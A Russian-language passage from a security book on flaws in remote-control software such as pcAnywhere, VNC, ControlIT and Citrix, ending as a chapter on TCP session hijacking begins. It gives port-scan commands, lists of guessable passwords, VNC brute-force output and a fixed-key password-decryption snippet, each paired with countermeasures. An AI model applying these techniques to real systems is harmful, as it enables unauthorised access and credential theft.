    Ввиду того что электронная коммерция продолжает играть основную роль в электронной промышленности, воздействие атак DoS на электронное сообщество будет все время возрастать. В настоящее время многие организации начали получать свои доходы от предоставления интерактивных ресурсов. В результате распределенная атака DoS может при вести некоторые из них к банкротству. Что еще более важно, так это возможности сокрытия, которые в каждой атаке используются в полной мере. И наконец, не забывайте о том, что атаки DoS применяются и в милитаристских целях. Многие правительства планируют или уже приступили к разработке приемов ведения электронных войн, в которые вовлечены атаки DoS, а не обычные ракеты. Поистине пришло время кибертерроризма.


    Глава 13. Изъяны средств удаленного управления



    Глава 13. ИЗЪЯНЫ СРЕДСТВ УДАЛЕННОГО УПРАВЛЕНИЯ




    1. Изъяны средств удаленного управления



    Изъяны средств удаленного управления


    Неотъемлемой чертой глобальной единой экономики является то, что и управлять ею нужно глобально. Вспомогательный персонал не всегда может оказаться на месте, чтобы подойти к закапризничавшему компьютеру и устранить проблему. Какой же выход? Программное обеспечение удаленного управления.
    Такие программы, как pcAnywhere, ControlIT, ReachOut и Timbuktu, стали настоящей находкой для администраторов, позволяя им виртуально перемешаться на компьютеры пользователей и устранять проблемы или помогать выполнять стоящие перед ними задачи. К сожалению, такое программное обеспечение зачастую неправильно настроено или имеет изъяны в подсистеме защиты. Это позволяет взломщикам получать доступ к системам, переписывать секретную информацию, или, хуже того, использовать данный компьютер для взлома всей сети компании, создавая при этом впечатление, что эту атаку предпринял сотрудник данной организации.
    В этой главе обсуждаются приемы, используемые взломщиками для поиска перечисленных программ в сети какой-либо организации (в главе 9 изложена подробная информация об удаленном управлении через модемное соединение). Кроме того вы узнаете, как злоумышленники пользуются ошибками в конфигурационных параметрах и дырами в системе защиты, а также о том, какие шаги следует предпринять, чтобы устранить все найденные изъяны.


    2. Обзор программ удаленного управления



    Обзор программ удаленного управления


    Каждая программа, предназначенная для работы в сети, ожидает установки соединений, открывая для этого определенные порты узла. Число и тип этих портов полностью определяется самой программой. Сканируя порты какого-то компьютера, можно определить все работающие на нем программы удаленного управления. Остается только удивляться, как много пользователей устанавливают такое программное обеспечение без соответствующих санкций и требуемой поддержки.
    В табл. 13.1 перечислены различные программные продукты удаленного управления, а также прослушиваемые порты, используемые этими программами по умолчанию. В этом списке содержатся лишь общие сведения, поскольку многие продукты, как указано в таблице, позволяют использовать для входящих соединений любой свободный порт.
    Не забывайте о том, что для использования нужных портов изменить параметры следует как на узле, так и компьютере, с которого устанавливается соединение. Если изменить номер порта только на одном из двух соединяемых компьютеров, в настройках второго все равно останется порт 65301, установленный по умолчанию для соединений TCP. Работая на компьютере под управлением операционной системы Windows, для сканирования портов мы рекомендуем воспользоваться одной из таких замечательных программ, как NetScanTools Pro 2000, SuperScan, NTOScanner, WinScan, ipEye или WUPS, описанных в главе 2. Можно также проверить, как работает программа fscan компании Fundstone, которую можно найти по адресу http://www.foundstone.com. Каждая из этих быстрых, гибких и надежных утилит предназначена для идентификации портов, используемых службами удаленного управления.
    Чтобы выполнить сканирование портов с компьютера под управлением системы Linux, всегда можно воспользоваться проверенной программой-сканером nmap (http://www. insecure.org/nmap), с помощью которой поиск требуемого программного обеспечения можно вести по всей подсети, nmap -sS -p 407,799,1494,2000,5631,5800,43188 -n 192.168.10.0/24
    Таблица 13.1. Программное обеспечение удаленного управления, обнаруживаемое при сканировании определенных портов

    Программа
    TCP
    UDP
    Возможность использования альтернативных портов
    Citrix ICA
    1494
    1494
    Неизвестно
    pcAnywhere
    22,5631,5632,65301
    22, 5632
    Да1
    ReachOut
    43188
    Нет
    Нет
    Remotely Anywhere
    2000, 2001
    Нет
    Да
    Remotely Possible/ControllT
    799, 800
    800
    Да
    Timbuktu
    407
    407
    Нет
    VNC
    5800, 5801..., 5900, 5901...
    Нет
    Да
    Терминальные службы системы Windows
    3389
    Нет
    Нет

    Как всегда, для одновременного сканирования нескольких сетей и обнаружения всех систем, от которых можно ждать неприятностей, мы рекомендуем использовать сценарий на языке Perl, который можно найти на Web-узле http://www.hackingexposed.com.


    3. Соединение



    Соединение


    Как только взломщик получит всю необходимую информацию о службах удаленного управления рабочих станций и серверов, скорее всего, он попытается получить к ним доступ. После установки с параметрами, используемыми по умолчанию, практически все приложения удаленного управления позволяют устанавливать соединение любому пользователю. Причем для этого не требуется указывать ни имя, ни пароль. (Взломщикам это нравится.)
    Единственный способ проверить, защищен ли паролем подобный программный пакет, — это попытаться установить соединение "вручную", воспользовавшись соответствующим программным обеспечением. Нам ничего неизвестно о каких-либо сценариях, которые позволяют автоматизировать этот процесс. Не стоит волноваться, если вы обнаружили в сети компьютер с каким-нибудь приложением удаленного управления и не имеете соответствующей полнофункциональной версии (скажем, Timbuktu или ControllT). Ее всегда можно найти в Web. В Internet можно найти также демонстрационные и пробные версии почти всех популярных программ удаленного управления.
    Установите эти программы и попытайтесь соединиться с требуемыми узлами по очереди. Как насчет пользователей, которые используют пустой пароль? Если на экране не появилось приглашения для ввода имени пользователя, то как подарок рождественским утром на нем отобразится диалоговое окно приложения удаленного управления.
    Если эта простая атака завершилась неудачей, можно выполнить инвентаризацию пользователей (более подробная информация об этом содержится в главе 3) и попытаться воспользоваться их именами. Во многих программах удаленного управления для аутентификации по умолчанию используются те же имена и пароли, что и в операционной системе NT. Имея в своем распоряжении системные имена, можно снова связаться с удаленным узлом и попробовать каждое из полученных имен пользователей, а также такие общепринятые пароли, как <пробел>, "имя_пользователя", password, admin, secret, <имя_компании> и т.д. Если это не принесет результатов, значит, данная программа, по крайней мере, надежно защищена паролем.


    4. Изъяны программ удаленного управления



    Изъяны программ удаленного управления


    Часто приходится слышать, что уровень защищенности узла определяется прочностью самого слабого звена. Однако по отношению к программному обеспечению удаленного управления дело обстоит несколько иначе. Если узел удалось взломать (см. главу 5), то злоумышленники смогут воспользоваться обнаруженными изъянами и позже подключиться вполне законным путем. Например, некоторые старые программные продукты не шифруют имена и пароли пользователей, что дает возможность взломщикам извлечь их из файлов, с экрана монитора, или, еще хуже, из сетевого трафика. Единственный способ убедиться в том, что программные продукты надежно защищены, заключается в проведении их тестирования.
    В программах удаленного управления имеется несколько изъянов. Тем не менее. проверить придется наличие каждого из них. Ниже перечислены некоторые известные проблемы.

    •  Имена и пароли пользователей передаются в виде незашифрованного текста.
    •  Использование слабых алгоритмов шифрования паролей (например, с использованием подстановки).
    •  Раскрываемые пароли (которые можно извлечь удаленно с применением средств с графическим интерфейсом либо скопировав требуемые файлы на локальный компьютер).
    •  Загружаемые профили.

    Незашифрованные имена пользователей и пароли



    Программа Remotely Possible 4.0 компании Computer Associates не обеспечивает никакой защиты имен пользователей и паролей. Как видно из рис. 13.1, в файле \PROGRAM FILES\AVALAN\ REMOTELY POSSIBLE\MAIN.SAB. Эти данные хранятся в текстовом формате — все ключи от королевства в одном месте!



    Рис. 13.1. В окне текстового редактора видно, что имена пользователей и пароли программы Remotely Possible 4.0 хранятся в виде незашифрованного текста: пользователем TEST применяется пароль abcabc

    После обнаружения этого факта компания Computer Associates выпустила модуль обновления, обеспечивающий некоторый уровень шифрования конфиденциальной информации. Предполагалось, что этот модуль обновления вместе с новой версией программного продукта, ControlIT 4.5, позволит зашифровывать пароли, хранящиеся в файле VAIN . SAB. Весь вопрос в том, насколько надежной окажется такая защита.

    Пароли, шифруемые с помощью алгоритма подстановки



    Предполагалось, что в программе ControlIT 4.5 (новой версии программы Remotely Possible 4.0) будут устранены недостатки предыдущей версии, в которой имена пользователей и пароли хранились в виде незашифрованного текста. Однако вместо реализации надежного алгоритма шифрования компания применила простой алгоритм подстановки, который, кроме того, используется только для шифрования паролей. Например, пароль abcdabcd выглядит следующим образом. р | x d р | х d
    Зная это, можно составить схему подстановки всех символов алфавита и легко расшифровать любой пароль. Поскольку имена пользователей по-прежнему содержатся в виде незашифрованного текста, то охота будет весьма результативной.


    1.gif

    Изображение: 

    5. Раскрываемые пароли



    Раскрываемые пароли


    Программа Revelation компании SandBoy Software (http://www.sandboy.com) представляет собой одно из незаменимых средств. Единственный исполняемый файл размером 14 Кбайт позволяет получить хранящиеся в оперативной памяти пароли многих популярных программ удаленного управления.
    Каждому знакомо диалоговое окно пароля, в котором вместо вводимых символов появляются звездочки. Оказывается, что в этом окне пароль никак не шифруется, а просто замешается. Этот изъян имеется во многих приложениях, включая pcAnywhere (без модуля обновления), VNC и Remotely Possible/ControlIT. С помощью утилиты Revelation можно извлечь пароль, который скрывается за звездочками, просто перетащив мышкой объект Revelation в требуемое поле.
    С другой стороны, программы ReachOut, Remotely Anywhere, Timbuktu и версия пакета pcAnywhere с модулем обновления защищены от подобной деятельности. В программах ReachOut и Remotely Anywhere это обеспечивается благодаря тому, что для управления учетными записями в них используются средства диспетчера пользователей NT. Программа Timbuktu, диалоговое окно которой приведено на следующем рисунке, тоже является достаточно надежной, поскольку в ней используется более безопасный механизм шифрования паролей.



    2.gif

    Изображение: 

    6. Загрузка профилей



    Загрузка профилей

    Как только взломщикам удастся проникнуть в систему NT и каким-нибудь способом получить административные привилегии, они смогут загрузить свои собственные профили (например, файлы . CIF или MAIN. SAB) и автоматически получить доступ к системе, пользуясь своим собственным паролем! Этой атаке подвержена как программа pcAnywhere, так и Remotely Possible 4.0. Для этого взломщику достаточно выполнить следующие действия.
    1. Создать профиль соединения в рамках своей копии pcAnywhere или Remotely Possible.
    2. Найти и скопировать новый профиль в каталог \DATA или \AVALAN\REMOTELY POSSIBLE целевой системы.
    3. С помощью программ pcAnywhere или Remotely Possible 4.0 соединиться с удаленным компьютером и ввести свое имя пользователя и пароль.
    Если используемый вами программный продукт хранит данные о соединениях в отдельных файлах, то он, скорее всего, уязвим для таких атак. Проведите тестирование и удостоверьтесь в его защищенности или примите все необходимые меры по обеспечению безопасности.

    Контрмеры



    Для повышения защищенности и устранения перечисленных выше недостатков можно воспользоваться несколькими приемами. Выполнение следующих шагов позволит значительно повысить уровень безопасности установленного программного обеспечения.

    Использование паролей



    Хотя необходимость этой меры предосторожности очевидна и интуитивно понятна всем администраторам, имена пользователей и пароли на удаленных узлах применяются далеко не всегда. Производители программ тоже не всегда стремятся помочь в данной ситуации, надеясь на администраторов. Как видно из рис. 13.2, схема аутентификации, используемая в программе pcAnywhere по умолчанию, является весьма либеральной. Чтобы исправить эту ситуацию, просто установите режим Specify individual caller privileges.



    Рис. 13.2. В программе pcAnywhere 8.0 по умолчанию используется режим Allow Full /Access То All Callers

    Усиленные требования к паролям



    Некоторые приложения, такие как pcAnywhere, позволяют повысить требования к используемым паролям, например сделать их чувствительными к регистру. Чтобы активизировать этот режим, откройте диалоговое окно свойств сети (NETWORK properties). Затем перейдите во вкладку Security Options и установите флажок Make passwords case sensitive. Как видно из рис. 13.3, этот режим по умолчанию отключен.
    Программа Timbuktu обладает аналогичным механизмом защиты паролей. Как показано на следующем рисунке, можно ограничить возможность их повторного использования, задать минимальную длину пароля и количество дней, в течение которых его можно использовать.

    Альтернативная аутентификация



    Большинство приложений позволяет активизировать процедуру аутентификации в форме, отличной от принятой в системе NT. Однако по умолчанию этот режим обычно не активизирован. Несмотря на то, что при этом придется поддерживать два набора имен и паролей пользователей, такая возможность с успехом может расстроить планы взломщиков.



    Рис. 13.3. Один из возможных способов повышения уровня безопасности программы pcAnywhere заключается в использовании чувствительных к регистру паролей. Убедитесь, что установлен именно этот режим!

    В программах Remotely Possible и ControlIT по умолчанию используются собственные механизмы аутентификации, тогда как в Timbuktu и ReachOut по умолчанию применяется аутентификация NT. При этом проблема состоит в том, что после успешного взлома злоумышленник сразу же получает пароли всех пользователей приложений удаленного управления.

    Дополнительные возможности использования паролей



    Программы Timbuktu и pcAnywhere предоставляют дополнительные возможности использования паролей, которыми следует пользоваться при любой возможности. Так, в pcAnywhere можно защитить паролем профили как исходящего, так и входящего соединения. Это не позволит кому-либо постороннему выведать пароль аутентификации, скрытый за звездочками. Установить пароль на доступ к профилям программы pcAnywhere (т.е. повысить уровень безопасности) можно в диалоговом окне NETWORK Properties во вкладке Protect Item, как показано на следующем рисунке.
    Помимо аналогичных возможностей, программа Timbuktu позволяет ограничить доступ к параметрам безопасности.


    Выход из системы после завершении сеанса связи



    Программы Remotely Possible/ControlIT, pcAnywhere и ReachOut можно настроить так, чтобы после окончания сеанса связи выполнялся также выход из системы. Такая возможность оказывается чрезвычайно важной, поскольку если администратор забудет выйти из системы после выполнения своей работы, кто-либо другой сможет воспользоваться его привилегиями.
    Чтобы включить этот режим в программе ReachOut, выполните следующие действия.
    1. Выберите команду Security.
    2. Перейдите во вкладку Disconnect и установите режим Log The Current User Off This Computer.

    Кодирование сообщений во время сеанса связи



    В более ранних версиях многих программ удаленного управления можно было перехватить имена пользователей и пароли во время их передачи по сети или разгадать простые алгоритмы шифрования. Удостоверьтесь в том, что используется наивысший уровень шифрования, обеспечиваемый программным обеспечением. Наилучшим средством для проверки надежности алгоритмов шифрования является программа анализа сетевых пакетов SnifferPro от компании Network Associates (http://www. nai.com) Остается только удивляться, насколько слабыми оказываются алгоритмы шифрования, применяемые в некоторых программных продуктах.

    Ограничение числа попыток регистрации



    Большинство приложений позволяет ограничить количество попыток регистрации. В случае превышения заданного значения система будет заблокирована. Данная возможность хороша тем, что может отпугнуть взломщика, и он обратит свое внимание на менее защищенные системы. Даже если этого не произойдет, администратор сможет узнать об атаке и предпринять соответствующие меры. Мы рекомендуем ограничиться тремя неудачными попытками регистрации.

    Учет неудачных попыток регистрации



    Следует регистрировать как успешные, так и неудачные попытки регистрации. Для этого можно использовать либо журнал регистрации событий системы NT, либо соответствующие файлы самих приложений удаленного управления. Эта информация значительно облегчит обнаружение попыток взлома и выявление злоумышленников.

    Блокирование пользователей, которым не удалось зарегистрироваться



    Это одна из наиболее важных возможностей. Однако в большинстве приложений удаленного управления она отсутствует. ReachOut от компании Stac Electronics оказалась единственной из всех протестированных нами программ, в которой реализован так называемый режим IntmderGuard (защита от нарушителей). Для активизации этого важного режима выполните следующие действия.
    1. Выберите команду Security.
    2. Перейдите во вкладку Connect, в группе User Lockout установите режим Trip IntruderGuard, а затем задайте количество неудачных попыток регистрации, после которых будет активизирован компонент IntruderGuard. Мы рекомендуем разрешить три неудачные попытки регистрации.

    Изменение порта, прослушиваемого по умолчанию



    Многие не рассматривают изменение порта, используемого по умолчанию, как эффективную меру повышения безопасности, поскольку в ее основе лежит внутренне противоречивая парадигма "безопасность за счет сокрытия". Однако полученный нами практический опыт говорит о том, что применение подобных правил является достаточно эффективным. Другими словами, для обеспечения безопасности нужно предпринимать любые возможные меры. Пусть данная мера не позволит полностью защитить систему, но по крайней мере она может задержать дальнейшее продвижение взломщика,


    3.gif

    Изображение: 

    4.gif

    Изображение: 

    5.gif

    Изображение: 

    6.gif

    Изображение: 

    7. Какой пакет является наилучшим с точки зрения безопасности



    Какой пакет является наилучшим с точки зрения безопасности



    К сожалению, на поставленный вопрос ответить нелегко. Каждый программный продукт имеет свои преимущества и недостатки. Наилучший пакет должен сочетать в себе возможности различных программ. Обладая всеми другими современными возможностями, он, скорее всего, оказался бы слишком сложным. Далее приводится краткое описание основных средств удаленного управления, а также их сравнительная характеристика.


    8. рсAnywhere



    pcAnywhere

    На современном рынке программа pcAnywhere компании Symantec (http://www.symantec.com) является одной из самых популярных. В значительной мере ее притягательность для потребителя определяется ее безопасностью. У всех приложений есть свои недостатки, но по сравнению с другими программными продуктами pcAnywhere обладает наиболее мощными средствами обеспечения безопасности. К другим возможностям относятся надежное шифрование паролей, механизм альтернативной аутентификации, установка паролей на файлы профилей и конфигурационных параметров, выход пользователя из системы после завершения сеанса связи, шифрование сетевого трафика, ограничение числа попыток регистрации, а также регистрация неудачных попыток. К сожалению, как и многие другие приложения, pcAnywhere не способна противостоять программе Revelation, предназначенной для получения пароля. Более подробную информацию по этому поводу можно найти в . разделе этой главы "Раскрываемые Пароли".


    9. ReachOut



    ReachOut



    Программа ReachOut компании Stac Electronics (http://www.stac.com)— еще один добротный программный продукт, предназначенный для удаленного управления. Однако он предоставляет меньше возможностей для обеспечения безопасности. В этой программе отсутствуют средства реализации строгой политики выбора паролей, альтернативной аутентификации, а также защиты паролем файлов профилей и конфигурационных параметров. Однако не все упрощения программы ReachOut являются отрицательными. Она использует единственный порт TCP/UDP с номером 43188, что значительно ограничивает возможности взломщиков.


    10. Remotely Anywhere



    Remotely Anywhere


    Remotely Anywhere (http://www.remotelyanywhere.com) является новичком среди программ данного класса, однако, несмотря на это, выглядит многообещающей. Этот программный продукт позволяет удаленно управлять рабочим столом, а по возможностям общего системного управления программа Remotely Anywhere выделяется среди других средств. Кроме обычных функций удаленного управления, с помощью Web-броузера она позволяет выполнять почти все административные функции, имеющиеся в системе NT.
    Пользователи, группы, системный реестр, журналы регистрации, процессы, планирование выполнения задач, список процессов, диспетчер файлов, драйверы, служебные программы — все эти компоненты можно настраивать через Web-броузер, а затем управлять ими. Это означает, что для управления системой NT даже не нужен графический интерфейс.
    Естественно, программа Remotely Anywhere не лишена недостатков. Если взломщики смогут получить доступ к системе, то для выполнения дальнейших действий им не нужно будет ждать, пока пользователи уйдут домой. Достаточно просто запустить служебный процесс и приступить к работе. К сожалению, в настоящее время в программе Remotely Anywhere отсутствует альтернативный механизм аутентификации, отличный от аутентификации системы NT. Поэтому она становится уязвимой сразу после того, как будет взломана сама система. Программа Remotely Anywhere позволяет повысить уровень защиты, если включен режим блокирования IP-адресов (рис. 13.4). По умолчанию эта возможность не используется, хотя она позволяет блокировать доступ злоумышленникам после нескольких неудачных попыток регистрации.
    С точки зрения управляемости программа Remotely Anywhere превосходит такие стандартные служебные программы с графическим интерфейсом, как User Manager, Event Viewer и REGEDIT32, поскольку они функционируют локально и для завершения операций требуется некоторое время. Например, через Web-броузер можно добавить пользователя или группу и тут же получить результат, тогда как при использовании стандартных утилит управления придется ожидать, пока графический интерфейс перешлет управляющие команды в систему. Достоинством программы Remotely Anywhere является то, что в ней имеются некоторые средства повышения уровня безопасности, которые достойны того, чтобы их использовать.

    •  Защищенный канал на базе протокола SSL (порт 2001).
    •  Фильтрация IP-адресов.
    •  Блокирование IP-адресов.
    • Защищенная аутентификация NTLM.


    11. Remotely Possible/ControlIT



    Remotely Possible/ControllT


    ControlIT — известный и популярный продукт компании Computer Associates (http://www.cai.com). Однако эта программа предоставляет наиболее низкий уровень безопасности. Помимо того что в ее более ранних версиях использовались имена и пароли в виде незашифрованного текста, даже в последних версиях реализованы ненадежные алгоритмы шифрования, что делает пароли уязвимыми для злоумышленников. Производители не обеспечили поддержки строгой политики использования паролей, а также возможности установки пароля для доступа к файлам профилей и конфигурационных параметров. Кроме того, в программе отсутствуют средства аудита неудачных попыток регистрации и защита от применения программы Revelation.


    12. Timbuktu



    Timbuktu


    Приложение Timbuktu Pro 32 компании Netopia (http://www.netopia.com) — еще одно средство удаленного управления, широко применяемое в больших организациях. Эта программа предоставляет все стандартные инструменты удаленного управления, а также несколько дополнительных возможностей. Этот программный продукт позволяет совместно использовать экран нескольким пользователям одновременно, а также обладает такими надежными средствами защиты, как ограничение минимальной длины пароля, управление повторным использованием паролей, альтернативная аутентификация
    и ограничение срока, в течение которого можно использовать один и тот же пароль. Что самое приятное, программа Revelation не способна выявить пароль, используемый в приложении Timbuktu, что значительно повышает его надежность.


    13. Virtual Network Computing (VNC)

     

    Virtual Network Computing (VNC)

    Программа Virtual Network Computing разработана в Англии, в лаборатории AT&T Research Labs Кембриджского университета. Ее можно найти по адресу https://www.comparitech.com/vpn/what-is-a-vnc-and-how-does-it-differ-from-a-vpn/. Программа обладает многими уникальными возможностями. Во-первых, ее можно использовать на многих платформах. Этот программный продукт можно устанавливать на компьютеры под управлением системы Windows, Linux и Solaris, а просматривать — в Windows, Linux, Solaris, Macintosh и даже с помощью Windows СЕ. Кроме того, эта программа имеет интерфейс на языке Java, что позволяет ее использовать через такие Java-совместимые броузеры, как Netscape Communicator и Microsoft Internet Explorer. Лучше всего то, что программа VNC является бесплатной!
    Поскольку программа VNC обладает такими богатыми функциональными возможностями, неудивительно, что работа с этим продуктом сопряжена с некоторыми серьезными проблемами, связанными с нарушением безопасности. Она оказывается уязвимой при использовании программы Revelation. Как было показано в главе 5, через удаленное соединение программу VNC можно легко установить в системе Windows NT. Все что для этого требуется, — это инсталлировать службу VNC из командной строки после единственного изменения удаленного системного реестра, что позволит запустить ее в скрытом режиме. Конечно же, независимо от версии в списке Process List все равно будет содержаться процесс winVNC. EXE. Однако важнее всего то, что программа VNC подвержена следующим атакам.

    •  Прямой подбор паролей VNC. Ненадежные пароли позволят взломщику получить полный контроль над системой, в которой запущен сервер VNC.
    •  Перехват сетевого трафика. По умолчанию после аутентификации пользователя сервер VNC не выполняет шифрования данных.
    •  Ненадежный метод хранения паролей WinVNC. Пароли сервера хранятся в таком виде, что взломщик все равно сможет их восстановить в незашифрованной форме.

    Ниже каждая из этих атак будет рассмотрена более подробно.

    Прямой подбор паролей VNC

     

    Основным механизмом защиты сервера VNC от несанкционированного доступа является пароль, выбранный системным администратором. В этой книге уже не раз отмечалось, что взлом проще всего осуществить, если используются ненадежные пароли. Поскольку серверу VNC зачастую предоставляются высокие привилегии, решительно настроенный взломщик, проявив определенное упорство, сможет подобрать пароль сервера VNC "в лоб", простым перебором. Для подбора паролей VNC можно воспользоваться дополнительной программой rfbproto.c , которую можно применить к клиентскому приложению vncviewer. С помощью команды patch программу rfbproto.c нужно применить к пакету vnc-3.3.3rl_unixsrc.tgz. В следующем примере демонстрируется, как легко подобрать пароль сервера VNC.

    [crush] # vncviewer 192.168.1.101
    v'MC server supports protocol version 3.3 (viewer 3.3)
    Trying password '#!comment:' VNC authentication failed
    Trying password 'Common'
    VNC authentication failed
    Trying password 'passwords,'
    VNC authentication failed
    Trying password 'compiled1
    VNC authentication failed
    Trying password 'passwd'
    VNC authentication failed
    Trying password 'test'
    VNC authentication succeeded
    Desktop name "twistervm"
    Connected to VNC server, using protocol version 3.3

    Модифицированный клиент vncviewer быстро перебрал предоставленный список паролей и отгадал пароль test. После этого программа vncviewer соединилась с удаленным сервером и взломщик получил полный контроль над системой. Подобный подбор паролей производится очень быстро, и сервер VNC никак не реагирует на неудачные попытки регистрации.

    Контрмеры: защита от подбора паролей VNС

     

    При настройке сервера VNC важно выбрать надежный пароль. В нем должно содержаться не меньше восьми символов. Пароль не должен быть словом или производной от слова, найденного в словаре. Не забывайте о том, что пароль — это единственная преграда, стоящая между взломщиком и системой. Так что выбирайте его очень внимательно!

    Перехват сетевого трафика

     

    Если пакет VNC установлен без каких бы то ни было модификаций, то после аутентификации шифрование потока сообщений между клиентом и сервером не выполняется. Не стоит надеяться на то, что если этот поток сообщений сжат, то его труднее перехватить, чем, скажем, в сеансе telnet. Поскольку файлы с исходным кодом VNC найти очень легко, то не составит особого труда и разработать специальный перехватчик сообщений VNC. Поэтому установка соединения с сервером VNC без применения шифрования сопряжена с большим риском. Хотя исходный пароль VNC передается с использованием механизма "вопрос/ответ", весь поток сообщений передается в незашифрованном виде. Вполне возможно, что взломщик сможет отследить передаваемые сообщения и перехватить пароли, вводимые пользователями при регистрации.

    Контрмеры: предотвращение перехвата сетевого трафика

     

    К счастью, существуют различные механизмы, которые можно использовать для шифрования трафика VNC. Первым и основным из них является использование оболочки ssh, с помощью которой можно организовать защищенный канал между клиентом и сервером VNC. . Кроме того, к исходному коду пакета VNC можно применить дополнительные модули (http://web.mit.edu/thouis/vnc/), которые позволяют реализовать шифрование по открытому ключу. И наконец, для контроля каждого IP-адреса, с которого происходит доступ, можно использовать ТСР-оболочки (http://www.uk.research.att.com/vnc/archives/1998-09/0168.html).

    Ненадежный метод хранения паролей VNC

     

    В октябре 1999 года Конд Вампиро (Conde Vampiro) сообщил о некоторых изъянах программы VNC (http://www.roses-labs.com/advisory/RLvncbug.txt). Самый серьезный недостаток связан с тем, как служба VNC хранит пароль сервера VNC (а именно в системном реестре Windows). Хотя пароль сервера VNC шифруется с помощью алгоритма 3DES, при этом пароль каждый раз сохраняется с использованием фиксированного ключа (23 82 107 6 35 78 88 7). Это еще один наглядный пример неумелого применения надежного алгоритма шифрования (3DES). Поскольку ключ известен, то можно без проблем расшифровать пароль любого сервера VNC.
    Пароль VNC хранится в ключе системного реестра HKEY_USERSX.DEFAULT\ SOFTWARE\ ORL\WinVNC3\Password. В нашем примере этот ключ представлен следующим блоком данных
    2F 98 ID С5 48 ЕО 9Е С2
    Если сервер, на котором запущена служба VNC, взломан, то для получения пароля VNC можно воспользоваться программой vncdec  (более подробную информацию о взломе систем Windows NT и 2000 можно найти в главах 5 и 6 соответственно). Перед компиляцией исходного файла его нужно немного изменить, чтобы строка паролей выглядела следующим образом.

    /*поместите в массив р[] хеш-код пароля*/
    char p[]=(Ox2F, 0x98, OxlD, OxC5, 0x48, OxEO, Ox9E, ОхС2};

    После этого можно скомпоновать исполняемый файл vndec, а затем запустить его.

    [shadow]# vncdec
    test

    Как видно из примера, пароль сервера test без особых усилий можно перевести в незашифрованный текстовый формат.

    Контрмеры против ненадежного хранения паролей VNС

     

    В последней версии программы, доступной во время написания данной книги, этот недостаток все еще не был устранен. Наилучшей зашитой от доступа взломщиков к системному реестру является использование средств обеспечения безопасности на уровне серверов. В главах 5 и 6 приведен исчерпывающий список мер предосторожности систем Windows NT и 2000.

     

    14. Citrix



    Citrix


    Клиентская программа ICA (Independent Computing Architecture) и программа MultiWin компании Citrix обеспечивают возможность реализации многопользовательской среды в Windows NT, являющейся однопользовательской операционной системой (конечно, терминальный сервер системы NT и Win 2000 с терминальными службами являются исключениями). Серверный продукт WinFrame и программа MetaFrame, предназначенная для использования вместе с NT Terminal Server, предосташшют то, что в мире UNIX имеется уже несколько десятков лет: многопользовательские возможности.
    Чтобы в полной мере оценить эту технологию, приведем краткое описание работы системы Windows NT. Эта операционная система не позволяет запускать пользовательские процессы на сервере. Наоборот, когда пользователь начинает работу, например с Word for Windows или Outlook, эти приложения запускаются на его компьютере, используя его оперативную память и файл подкачки, а не сервера. Однако подобную обработку данных лучше выполнять на сервере. Именно в таких случаях оказывается полезной модель компании Citrix. С ее помощью пользователь может зарегистрироваться на терминальном сервере Windows NT и запускать на нем процессы, а также выполнять действия, как будто бы он работал на самом сервере. При этом каждая команда и каждый процесс выполняются на сервере, лишь в небольшой степени используя клиентский компьютер пользователя.
    Однако одной из отличительных особенностей программного продукта Citrix, выделяющей ее среди других инструментов информационных технологий, является та самая возможность, с которой связано много хлопот по обеспечению безопасности. В мире Citrix пользователь автоматически получает возможность запускать команды локально. Это означает, что многие программы взлома, такие как GETADMIN и SECHOLE, теперь можно использовать удаленно. Обычно для запуска подобных команд в среде NT взломщик, получивший доступ с правами пользователя, должен расширить свои привилегии и получить права администратора. Но Citrix автоматически предоставляет приглашение командной строки для удаленного запуска таких программ. Более подробную информацию об этом можно найти в главе 5.
    Однако программные продукты компании Citrix обладают тем преимуществом, что при аутентификации больше не используются порты 135 и 139. Фактически взломщики могут находиться на волосок от системы, но так и не подобраться к ней, поскольку открытым является только TCP/UDP порт 1494, которого в списке сканирования портов обычного взломщика может не оказаться.


    15. Резюме



    Резюме


    Программное обеспечение удаленного управления существенно облегчает управление распределенными сетевыми узлами. Настроив эти программы надлежащим образом, администратор может облегчить свою жизнь, соединяясь с рабочими станциями пользователей и устраняя практически любую проблему.
    Однако параметры, используемые в таких программах по умолчанию, не обеспечивают достаточно высокого уровня безопасности. В некоторых из них применяется лишь механизм аутентификации системы NT, другие ненадежно шифруют сетевой трафик или не обеспечивают надежного хранения паролей. В то же время большинство этих приложений позволяет добиться более высокого уровня защиты. Кроме того, следуйте приведенным рекомендациям, и применяйте все доступные модули обновления.


    Глава 14. Расширенные методы



    Глава 14. РАСШИРЕННЫЕ МЕТОДЫ




    1. Расширенные методы



    Расширенные методы


    В предыдущих главах уже были рассмотрены многие средства, используемые хакерами. Хотя мы и пытались систематизировать все стандартные инструменты, некоторые из них все же не укладываются в приведенную выше классификацию. В данной главе описываются несколько категорий таких средств, каждая в отдельном разделе: "Захват сеанса", "Потайные ходы", "Троянские кони" (троянский конь (Trojan horse) — это такая программа, которая под прикрытием некоторых полезных действий на самом деле скрытно выполняет совсем другие операции), "Разрушение системного окружения..." и "Социальная инженерия".
    Из предыдущих глав отобран некоторый материал, имеющий отношение к рассматриваемой теме и, по нашему мнению, заслуживающий повторного обсуждения. В результате все рассматриваемые вопросы будут раскрыты более полно, освещая все категории программного обеспечения, типы платформ и технологии. В конце концов, при выборе своих целей злоумышленников ничто не в состоянии остановить.


    2. Захват сеанса



    Захват сеанса


    Сетевые устройства поддерживают весь корпоративный поток сообщений. Каждое сообщение электронной почты, каждый файл, каждый номер кредитной карточки клиента передается по сети и обрабатывается этими устройствами. Очевидно, что обеспечение их безопасности является первоочередной задачей. Поэтому никогда нельзя исключать возможности, что сетевой трафик будет перехвачен злоумышленником. Ниже вы узнаете, как это можно осуществить с помощью так называемого захвата соединения TCP (TCP hijacking).
    Такой подход стал возможным из-за наличия ошибок в протоколе TCP. Протоколы TCP/IP допускают внедрение в поток сообщений ложного пакета, позволяя тем самым запускать команды на удаленном узле. Однако этот тип взлома возможен только в сети с множественным доступом (этому вопросу посвящен раздел "Множественный доступ и коммутация пакетов" главы 10, "Сетевые устройства"), и для него нужно немного везения. С помощью программы Juggernaut или Hunt взломщик может попытаться "подсмотреть" передаваемые данные, а затем перехватить соединение.

    Juggernaut



